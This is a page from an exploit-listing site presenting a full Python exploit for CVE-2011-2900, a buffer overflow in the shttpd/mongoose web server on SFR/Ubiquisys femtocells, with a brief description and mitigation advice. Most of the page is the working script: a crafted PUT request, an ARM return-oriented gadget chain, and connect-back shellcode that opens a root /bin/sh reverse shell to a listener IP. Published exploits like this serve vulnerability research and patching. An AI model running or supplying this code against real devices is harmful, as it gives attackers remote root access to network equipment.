Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose) - exploit.company
header-logo
Suggest Exploit
vendor:
Mongoose
by:
nion
9
CVSS
CRITICAL
Remote Code Execution
119
CWE
Product Name: Mongoose
Affected Version From: shttpd <= 1.42, mongoose <= 3.0
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2011-2900
CPE: a:mongoose:mongoose:3.0
Metasploit:
Other Scripts:
Platforms Tested: Linux (proprietary embedded distro) Linux 2.6.18-ubi-sys-V2.0.17
2011

Remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)

This exploit allows an attacker to gain remote root access on the sfr/ubiquisys femtocell webserver. It takes advantage of a vulnerability in the shttpd and mongoose software versions <= 1.42 and <= 3.0 respectively. By sending a specially crafted PUT request, the attacker can overwrite the program counter (pc) and execute arbitrary code. The exploit includes stack lifting techniques to bypass security measures and achieve the desired outcome.

Mitigation:

To mitigate this vulnerability, it is recommended to update the shttpd and mongoose software to versions higher than 1.42 and 3.0 respectively. Additionally, implementing proper input validation and sanitization techniques can help prevent similar attacks.
Source

Exploit-DB raw data:

#!/usr/bin/env python
# part of femtocell research by TU-Berlin
# only for educational purposes
# Exploit Title: remote root on sfr/ubiquisys femtocell webserver (wsal/shttpd/mongoose)
# Date: 2011-08-02
# Author: nion
# Software: http://code.google.com/p/mongoose/ http://sourceforge.net/projects/shttpd/
# Version: shttpd <= 1.42, mongoose <= 3.0
# CVE: CVE-2011-2900
# Tested on: Linux (proprietary embedded distro) Linux 2.6.18-ubi-sys-V2.0.17

import socket, sys, time
import urllib, struct

if(len(sys.argv) < 3):
	print sys.argv[0] + " <target ip> <listening ip>"
	sys.exit(-1)

target   = sys.argv[1]
listener = sys.argv[2]

SHELLCODE  = 0xbc568        # shellcode backup in connect struct, heap is not randomized
STACK_LIFT = "%a0%ce%31%40" # didnt want to use urllib to encode at this point
                            # because it moves the heap address depending on if character is printable or not
							# and i was too lazy to adjust the payload when cleaning up the exploit :)

buf = "PUT /"
buf += "A" * 107 # first fill bytes will not be 148 because stack layout looks different when leaving put_dir()
buf += STACK_LIFT

# repeated stack lifting
for i in xrange(0, 26):
	buf += "A" * 148
	buf += STACK_LIFT

buf += "B"*132    # padding to overwrite pc, last jump will go over this one
buf += STACK_LIFT # this will hit pc and produce our first jump
                  # add sp, sp, #132; pop {r4, r5, r6, r7, pc}

buf += "A"*12     # this will be our last stack lifting after
buf += STACK_LIFT # jumping through our buffer back up

# lets finish the path chunk and make some padding for the
# last stack lift before pc gets popped to a different place
buf+="AAAAAAAAA/"+"A"*138


# first jump
buf += urllib.quote(struct.pack("<L", 0x4032a410))
# --,
#   v
# prepare lr so we can properly return from __clear_cache
# 0x4032a410 <makecontext+28>:  pop {lr}        ; (ldr lr, [sp], #4)
# 0x4032a414 <makecontext+32>:  add sp, sp, #8  ; 0x8
# 0x4032a418 <makecontext+36>:  bx  lr
buf+=urllib.quote(struct.pack("<L", 0x403e937c)) # free_slotinfo+128, return from __clear_cache
buf+="DDDDDDDD" # skip sp lifting, 8 dummy bytes because sp is lifted before branching

# --, bx lr
#   v
# 0x403e937c <free_slotinfo+128>:   pop {r4, pc}
buf+="CCCC" # dummy r4
buf+=urllib.quote(struct.pack("<L", 0x402e5064)) # __aeabi_cfcmple+16
# --,
#   v
# 0x402e5064 <__aeabi_cfcmple+16>:   pop {r0, r1, r2, r3, pc}
buf+="AAAA" # dummy r0
buf+="CCCC" # dummy r1 (needed for __clear_cache)
buf+="DDDD"*2 # dummy r2, r3
buf+=urllib.quote(struct.pack("<L", 0x40364bbc)) # envz_merge+184
# --,
#   v
# 0x40364bbc <envz_merge+184>:  mov r0, r11
# 0x40364bc0 <envz_merge+188>:  pop {r4, r5, r6, r7, r8, r9, r11, pc}
# at this point r11 points to an address on the heap in front of
# our shellcode, e.g. 0xad220
buf+="FFFF"*7 # dummy r4-r9+r11
buf+=urllib.quote(struct.pack("<L", 0x402e5484)) # __clear_cache
# --,
#   v
# __clear_cache will return to our prepare lr (free_slotinfo+128)
# 0x403e937c <free_slotinfo+128>:   pop {r4, pc}
buf+="AAAA" # dummy r4
buf +=urllib.quote(struct.pack("<L", SHELLCODE)) # jump to shellcode

# shellcode + some testing garbage in front of it
buf += "A"*16 # some garbage padding in front of our payload, could be nops or whatever

# make listener shellcode friendly
evil_haxxor = urllib.quote("".join([struct.pack("B", int(x)) for x in listener.split('.')]))

# connect back shellcode
buf += "%01%10%8F%E2%11%FF%2F%E1%02%20%01%21%92%1A%0F%02%19%37%01%DF%06%1C%08%A1%10%22%02%37%01%DF%3F%27%02%21%30%1c%01%df%01%39%FB%D5%05%A0%92%1A%05%b4%69%46%0b%27%01%DF%C0%46%02%00%11%5c" + evil_haxxor + "%2f%62%69%6e%2f%73%68%00/ HTTP/1.0\r\n"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target, 80))
s.send(buf)
s.send("\r\n")
print s.recv(1024)

Navigation

Suggest Exploit

Services By CQR